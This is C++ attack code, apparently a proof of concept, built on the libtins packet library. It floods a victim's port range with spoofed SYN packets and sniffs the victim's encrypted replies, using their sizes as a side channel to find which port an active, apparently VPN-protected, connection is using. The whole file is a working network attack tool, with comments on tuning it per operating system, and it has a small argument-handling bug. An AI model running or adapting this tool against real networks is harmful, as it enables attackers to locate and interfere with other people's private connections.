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#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
using std::thread; using std::cout; using std::string; using namespace Tins;
int current_spoof_port, best_port, chack_count; bool sniffed_chack = false; bool is_running = true; bool verbose = false; bool count_chacks = false; bool quick_mode = true; // if true we don't recheck the port
int num_sent = 0; string victim_wlan_addr; string remote_addr;
void print_divider(int count) { int i = 0; while (i < count) { if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; i++; } }
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
// keep track of the last port we spoofed
if (ip.src_addr() == remote_addr) current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
if (ip.src_addr() == victim_wlan_addr) { // the packet is a response from the client
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size(); //cout << "sniffed something: " <<payload << "\n";
const int remainder = payload % 67; // 67 is the size of encrypted resets on ubuntu
if (remainder != 0) {
//cout << "\nsniffed something important - port : " << (current_spoof_port) << ", remainder : " << remainder << "\n";
// If it's not working as expected, uncomment the line above to
// check what the typical remainder is looking like as it scans the
// port range. In this case, ubuntu 19, if you uncomment the line above
// it would repeatedly sniff 41 packets until the correct port, then it
// would sniff a 48 packet
if (remainder != 41 && (remainder == 40 || remainder == 48)) { // the size of the remainder could change per OS
if (verbose) cout << "sniffed chack - port : " << (current_spoof_port) << ", remainder : " << remainder <<", full size: " << payload << "\n";
if (count_chacks) chack_count ++; if (verbose) cout << "some other val: " << ((payload - 79) % 67) << "\n"; if (!sniffed_chack) { sniffed_chack = true; best_port = current_spoof_port; } } } } return is_running; }
void sniff_stuff() { SnifferConfiguration config; config.set_promisc_mode(true); Sniffer sniffer("wlp1s0", config); sniffer.sniff_loop(handle_packet); }
bool rechack(int num_checks, int possible_port, string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
PacketSender sender; NetworkInterface iface("wlp1s0"); count_chacks = true; chack_count = 0;
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(possible_port, sport); TCP& tcp = pkt.rfind_pdu<TCP>(); tcp.set_flag(TCP::SYN, 1);
int count = 0; usleep(1000000 / 2);
while (count < num_checks) { sender.send(pkt, iface); usleep(1000000 / 2); // must sleep half second due to chack rate limit
count ++; }
usleep(1000000);
// should have just sniffed as many chacks as we just sent
if (verbose) cout << "end of rechack, count : " << chack_count << ", should be: " << num_checks << " \n";
if (chack_count >= num_checks) { return true; }
count_chacks = false; num_sent += count;
return false;
}
// Spreads SYNs across the victim's entire port range
// coming from a specific remote_ip:port
//
int phase_two_spread(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
PacketSender sender; NetworkInterface iface("wlp1s0");
int start_port = 39000;//32768; // typical Linux ephemeral port range - (32768, 61000)
int end_port = 42000;//61000;
int i;
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(40404, sport); TCP& tcp = pkt.rfind_pdu<TCP>(); tcp.set_flag(TCP::SYN, 1);
int current_port = best_port;
for (i = start_port; i < end_port; i ++) {
tcp.dport(i); // set the packets dest port to current guess
sender.send(pkt, iface); num_sent ++; usleep(10);
}
usleep(1000000); // sleep to give victim time to respond w chack
current_port = best_port; if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
// In round 1 we spoofed fast (10 sleep) to get a good estimate of the
// port in use. Round 2, we spoof slower from about 50 packets back to account
// for the delay in response and hopefully get the exact port number in use
print_divider(1); usleep(1000000 / 2); sniffed_chack = false;
int j; int send_delay = 300;
if (verbose) cout << "Starting round 2 spread from: " << (current_port - send_delay) << " to " << current_port << "\n"; for (j = (current_port - send_delay); j < current_port; j++) { tcp.dport(j); // set the packets dest port to current guess
sender.send(pkt, iface); num_sent ++; usleep(600 * 5); }
usleep(1000000);
if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
return best_port;
}
int find_port(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
bool is_found = false; int current_port = 0;
while (!is_found) {
current_port = phase_two_spread(dest_mac, src_mac, remote_addr, sport, victim_ip); print_divider(1);
if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
cout << current_port << "\n";
if (quick_mode) { is_found = true; } else { is_found = rechack(2, current_port, dest_mac, src_mac, remote_addr, sport, victim_ip); }
}
return current_port;
}
int main(int argc, char** argv) {
if (argc != 5 && argc != 6) { cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr)\n"; return 0; }
remote_addr = argv[1]; int sport = atoi(argv[2]); victim_wlan_addr = argv[3]; string dest_ip = argv[4]; //verbose = true;
string dest_mac = argv[5]; string src_mac = "";
print_divider(2);
thread sniff_thread(sniff_stuff);
int p = find_port(dest_mac, src_mac, remote_addr, sport, dest_ip); is_running = false; sniff_thread.detach(); //sniff_thread.join();
print_divider(1); if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n"; cout << p << "\n";
return p; }
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